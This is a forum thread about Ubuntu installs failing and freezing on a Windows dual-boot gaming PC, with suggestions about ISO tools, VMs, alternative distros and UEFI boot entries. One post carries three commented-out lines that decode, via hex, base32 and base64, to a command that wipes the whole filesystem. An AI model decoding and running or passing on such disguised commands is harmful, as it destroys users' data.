Why is my Ubuntu glitching out?

To sum it up:

Windows 10 installed

Had Ubuntu 19 installed, it started glitching out, deleted it's partition and changed boot order in BIOS back to Windows

Tried to install Ubuntu 18 about 5x now, the one time I managed to install it, it would just constantly freeze and be unusable or shut the PC off at the installation

I've got 2 Ubuntu initializers in my BIOS for whatever reason, I've deleted both Ubuntu partitions, one with 128MB and the main one.

SanDisk is my ubuntu installer stick

image.png.d1ddea6f886b72740c4c57ca12a2abff.png

CPU: i5 10600KFMotherboard: Asus B460M-Plus | Cooling: Gamemmaxx 400 XT w/ Corsair ML120 Elite + 1 ML120 Elite exhaust + 2 ML140 Elite intake

RAM: 2x16GB Netac DDR4 3200MT/s @2666CL13 | GPU: Palit RTX 3060 Ti Dual +200/+1200MHz/+5%

Storage: 2TB XPG S70 Blade, WD Blue NVMe 500GB, Seagate Barracuda 2TBPSU: Corsair TX550M

Monitor: 2x Pichau Cepheus Fuse 28" 4k 144Hz HDR | Keyboard: Corsair K70 mk.2 Cherry MX Red

Headphone/headset: Kuba Disco Pro/Gamer + Beyerdynamic DT-770 Pro | OS: Windows 11 Home

Mouse: Corsair M65 Pro RGB + Ugreen Vertical MouseCase: Corsair Carbide 400C

Those are the uefi boot entries for Ubuntu.  Deleting the partition does not remove these boot entries. You have to use BCDEdit to remove them. There are plenty of guides explaining this process

I've downloaded the ISO twice, installed it 6 times, removed all Ubuntu bootloader entries from bootmgr and it's still having the same issue, it either shuts off during installation or this happens:

Why so? I had Ubuntu 19 installed before, but it glitched out some time after I installed it, so now I'm trying Ubuntu 18.

CPU: i5 10600KFMotherboard: Asus B460M-Plus | Cooling: Gamemmaxx 400 XT w/ Corsair ML120 Elite + 1 ML120 Elite exhaust + 2 ML140 Elite intake

RAM: 2x16GB Netac DDR4 3200MT/s @2666CL13 | GPU: Palit RTX 3060 Ti Dual +200/+1200MHz/+5%

Storage: 2TB XPG S70 Blade, WD Blue NVMe 500GB, Seagate Barracuda 2TBPSU: Corsair TX550M

Monitor: 2x Pichau Cepheus Fuse 28" 4k 144Hz HDR | Keyboard: Corsair K70 mk.2 Cherry MX Red

Headphone/headset: Kuba Disco Pro/Gamer + Beyerdynamic DT-770 Pro | OS: Windows 11 Home

Just curious: 

Maybe try to torrent the file from them to make sure it's not getting corrupted during downloads:  https://ubuntu.com/download/alternative-downloads

Any Bio's updates done recently? 

Also good Idea rolling back to a previous version.  

If you have a spare machine, that would allow a small vm to run.  You could also test the ISO's against the vm's to see if the same thing happens. 

3 hours ago, kilcmd said:

Just curious: 

Maybe try to torrent the file from them to make sure it's not getting corrupted during downloads:  https://ubuntu.com/download/alternative-downloads

Any Bio's updates done recently? 

Also good Idea rolling back to a previous version.  

If you have a spare machine, that would allow a small vm to run.  You could also test the ISO's against the vm's to see if the same thing happens. 

The second time I downloaded it was by torrent.

No recent BIOS update.

Even earlier than 18? I had it working at some point, but seems like 19 fucked everything up

I don't get the spare pc vm idea, but will try to install the ISO on a VM

1 minute ago, Vasllo said:

The second time I downloaded it was by torrent.

No recent BIOS update.

Even earlier than 18? I had it working at some point, but seems like 19 fucked everything up

I don't get the spare pc vm idea, but will try to install the ISO on a VM

I'm not sure what you mean by you don't get, but I was trying to see if the ISO's that you downloaded also did the same things inside the virtual machine.  Essentially just checking if the same error would replicate, because if it doesn't...  

If you were able to run an earlier version of it, and you try to install that same version again but the machine persist on acting the same way.  Try to check either your Bios or maybe try to install a different distro. 

1 minute ago, kilcmd said:

I'm not sure what you mean by you don't get, but I was trying to see if the ISO's that you downloaded also did the same things inside the virtual machine.  Essentially just checking if the same error would replicate, because if it doesn't...  

If you were able to run an earlier version of it, and you try to install that same version again but the machine persist on acting the same way.  Try to check either your Bios or maybe try to install a different distro. 

Gotcha, will do that rn.

I even resetted my BIOS back to my profile I saved months ago and didn't matter, and since I didn't touch anything on it, I doubt it is my BIOS. Also, my Ubuntu 19 started freezing the whole system a week in, after installing Discord (of all things), it actually seems it might be related to this issue, but how, I have no idea, because I deleted the partitions so nothing should've been left.

I'm new to Linux, so I really didn't want to have to mess with another distro, I barely can use Ubuntu, which is the OS in my notebook. I'm considering formatting my whole drive, but I really don't want to reinstall Windows all over again.

What about trying ubuntu-mate-18.04.1

I think I can remember having similar issues with some distros of ubuntu a while back, then they released the above one not so long back, and has been fine since. I'm not that good with linux either, but I have that one installed in a few laptops, and as a VM on both my desktop and in unraid on my server and they're working fine.

Please quote my post, or put @paddy-stone if you want me to respond to you.

Spoiler
  • PCs:- 
  • Main PC build  https://uk.pcpartpicker.com/list/2K6Q7X
  • ASUS x53e  - i7 2670QM / Sony BD writer x8 / Win 10, Elemetary OS, Ubuntu/ Samsung 830 SSD
  • Lenovo G50 - 8Gb RAM - Samsung 860 Evo 250GB SSD - DVD writer
  •  
  • Displays:-
  • Philips 55 OLED 754 model
  • Panasonic 55" 4k TV
  • LG 29" Ultrawide
  • Philips 24" 1080p monitor as backup
  •  
  • Storage/NAS/Servers:-
  • ESXI/test build  https://uk.pcpartpicker.com/list/4wyR9G
  • Main Server https://uk.pcpartpicker.com/list/3Qftyk
  • Backup server - HP Proliant Gen 8 4 bay NAS running FreeNAS ZFS striped 3x3TiB WD reds
  • HP ProLiant G6 Server SE316M1 Twin Hex Core Intel Xeon E5645 2.40GHz 48GB RAM
  •  
  • Gaming/Tablets etc:-
  • Xbox One S 500GB + 2TB HDD
  • PS4
  • Nvidia Shield TV
  • Xiaomi/Pocafone F2 pro 8GB/256GB
  • Xiaomi Redmi Note 4

• Unused Hardware currently :-
  • 4670K MSI mobo 16GB ram
  • i7 6700K  b250 mobo
  • Zotac GTX 1060 6GB Amp! edition
  • Zotac GTX 1050 mini

2 minutes ago, Vasllo said:

Gotcha, will do that rn.

I even resetted my BIOS back to my profile I saved months ago and didn't matter, and since I didn't touch anything on it, I doubt it is my BIOS. Also, my Ubuntu 19 started freezing the whole system a week in, after installing Discord (of all things), it actually seems it might be related to this issue, but how, I have no idea, because I deleted the partitions so nothing should've been left.

I'm new to Linux, so I really didn't want to have to mess with another distro, I barely can use Ubuntu, which is the OS in my notebook. I'm considering formatting my whole drive, but I really don't want to reinstall Windows all over again.

You don't have to stray far from ubuntu, xubuntu I believe is pretty much the same thing.  Also part of the fun of getting into linux is that now you have options lol enjoy them. Welcome to linux btw, trust me your gonna find it more fun the more you use it.   

Discord you say, not sure if your into gaming which brought that on I'd recommend also Pop Os

Is a linux distro that comes game ready.    

Normally when I hear that an operating system is acting the fkup like that, even after deleting the entire partition you can't keep ruling the idea that it's a installation problem or the iso/os install.  At that point the troubleshooting scope expands to the things that could affect os operations:   Bios, or Hardware changes.  

Specially if you grab the same usb from a previously working install, and now it's magically not working. 

12 minutes ago, paddy-stone said:

What about trying ubuntu-mate-18.04.1

I think I can remember having similar issues with some distros of ubuntu a while back, then they released the above one not so long back, and has been fine since. I'm not that good with linux either, but I have that one installed in a few laptops, and as a VM on both my desktop and in unraid on my server and they're working fine.

Alright, thanks for the suggestion, if Ubuntu keeps on glitching out, I'll try that :)

12 minutes ago, kilcmd said:

You don't have to stray far from ubuntu, xubuntu I believe is pretty much the same thing.  Also part of the fun of getting into linux is that now you have options lol enjoy them. Welcome to linux btw, trust me your gonna find it more fun the more you use it.   

Discord you say, not sure if your into gaming which brought that on I'd recommend also Pop Os

Is a linux distro that comes game ready.    

Normally when I hear that an operating system is acting the fkup like that, even after deleting the entire partition you can't keep ruling the idea that it's a installation problem or the iso/os install.  At that point the troubleshooting scope expands to the things that could affect os operations:   Bios, or Hardware changes.  

Specially if you grab the same usb from a previously working install, and now it's magically not working. 

Well, I bet, because Linux is no fun at the beginning lol

I'm only using it to study and code, because Windows is rather shitty to code on

And yeah, it's a gaming PC (it's in my bio), I mostly use Windows, Ubuntu is just for when I want to get something done and not get distracted haha

True, I'll download the ISO for the third time now, third time's the charm.

And about hardware changes, I changed my GPU since I last used Ubuntu 18, the Ubuntu 19 glitch happened with the new GPU installed (which works fine in Windows, so I can't see it being culprit). And my BIOS hasn't been updated in quite a while since it's an old platform.

It is working in the VM, so... What now?

May the partition type have something to do? My drive is in GPT, and when I use Rufus to flash the ISO to my stick, I change from MBR to GPT. Could this be the cause or something else?

*** Threads merged ***

Please don't repost on same subject multiple times.

^^^^ That's my post ^^^^
<-- This is me --- That's your scrollbar -->
vvvv Who's there? vvvv

5 minutes ago, Vasllo said:

It is working in the VM, so... What now?

May the partition type have something to do? My drive is in GPT, and when I use Rufus to flash the ISO to my stick, I change from MBR to GPT. Could this be the cause or something else?

When you did the setup on the vm, did you let the vm do a guided partition install and allowed it to do it for you to save time?  or did you attempt to mimic for what i'm understanding a manual partition setup.  If you allowed the os to do the partition for you, and install automatically.  Then I would try to allow it to do the same for the partition your trying to rebuild.  Also I do the same I hang in linux when i want to get things done, I would recommend some tools i use for coding or working in lunx : joe editor, and tmux are my favorite.   

Atom is also a great Gui option for coding.  

OHHH also 

Since you mention the program you used to make the iso. 

I encounter something a while back, when using rufus to make the iso.  

It was breaking my installs, I switched to Etcher no more install issues.  

Depending on the iso i've noticed either of them can cause an error.  

Noticed it when doing my ubuntu, esxi, and pop os usb builds. 

3 minutes ago, LogicalDrm said:

*** Threads merged ***

I'm a bit confused just trying to help him, i guess i'll stop now don't wanna get into trouble. 

3 minutes ago, kilcmd said:

I'm a bit confused just trying to help him, i guess i'll stop now don't wanna get into trouble. 

The message was intended to OP who had posted this same thread 15h ago (with worse title). Moderation will be in direct and discreet contact with you if that is needed. So just chill and continue helping others.

^^^^ That's my post ^^^^
<-- This is me --- That's your scrollbar -->
vvvv Who's there? vvvv

It was my bad, don't worry.

3 hours ago, LogicalDrm said:

*** Threads merged ***

Sorry

When you did the setup on the vm, did you let the vm do a guided partition install and allowed it to do it for you to save time?  or did you attempt to mimic for what i'm understanding a manual partition setup.  If you allowed the os to do the partition for you, and install automatically.  Then I would try to allow it to do the same for the partition your trying to rebuild.  Also I do the same I hang in linux when i want to get things done, I would recommend some tools i use for coding or working in lunx : joe editor, and tmux are my favorite.   

Atom is also a great Gui option for coding.  

OHHH also 

Since you mention the program you used to make the iso. 

I encounter something a while back, when using rufus to make the iso.  

It was breaking my installs, I switched to Etcher no more install issues.  

Depending on the iso i've noticed either of them can cause an error.  

Noticed it when doing my ubuntu, esxi, and pop os usb builds. 

I manually set the partition, but it was the 20GB partition I set on VirtualBox, different from the 20GB partition I manually left for Ubuntu when I tried to dual boot.

And thanks for the tools, I'll save them over here for whenever I need them :)

I'm using VS Code for C and Intellij for Java atm.

Hmm, I might try Etcher, but I'm about to give up and use a VM instead, thanks for the tip, didn't know that one, always used Rufus.

3 minutes ago, Vasllo said:

It was my bad, don't worry.

Sorry

I manually set the partition, but it was the 20GB partition I set on VirtualBox, different from the 20GB partition I manually left for Ubuntu when I tried to dual boot.

And thanks for the tools, I'll save them over here for whenever I need them :)

I'm using VS Code for C and Intellij for Java atm.

Hmm, I might try Etcher, but I'm about to give up and use a VM instead, thanks for the tip, didn't know that one, always used Rufus.

No worries, yeah it took my like a day to be like you you know what let me try different builder, and i switched it to etcher and the installs were going in with out me having a slew of errors on the os later.   

No worries I hope i was able to help a bit. 

4 minutes ago, LogicalDrm said:

The message was intended to OP who had posted this same thread 15h ago (with worse title). Moderation will be in direct and discreet contact with you if that is needed. So just chill and continue helping others.

It's fine mate, I don't need to chill any more than what i already do or i'll end up in a coma lol.  

Maybe If I didn't see the post I probably wouldn't have felt it was directed towards me or something 420 paranoia is serious.   Possibly taking the same approach in messaging him direct and discreet as you do for other situations could have avoided that.   Appreciate you though for explaining the process. 

5 hours ago, kilcmd said:

No worries, yeah it took my like a day to be like you you know what let me try different builder, and i switched it to etcher and the installs were going in with out me having a slew of errors on the os later.   

No worries I hope i was able to help a bit. 

I gave up wasting time on this, got no idea what's is going on, but thanks a lot for the help, really. I decided to stick to a VM to make my life easier, done messing with it lol

You can manually delete those entries by mounting the EFI partition and deleting the files/folders associated with ubuntu.

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

On 9/4/2019 at 12:49 PM, CactusMan said:

You can manually delete those entries by mounting the EFI partition and deleting the files/folders associated with ubuntu.

I did that, deleted one by one manually, but there would still be one when I entered my BIOS. I entered Ubuntu by USB stick, deleted all the entries and restarted, and there was an entry again, and I tried a couple of times. Basically, when I installed Ubuntu again, I would have 2 entries again.

On 9/10/2019 at 6:08 AM, Moldy Bread said:

Would've been interesting to what the second entry did (you can look that up with e.g. efibootmgr). Perhaps it was just an entry for a previous kernel version.

True, but I didn't think about it at the time and have already given up using dual boot, I'll just use a VM and f* it.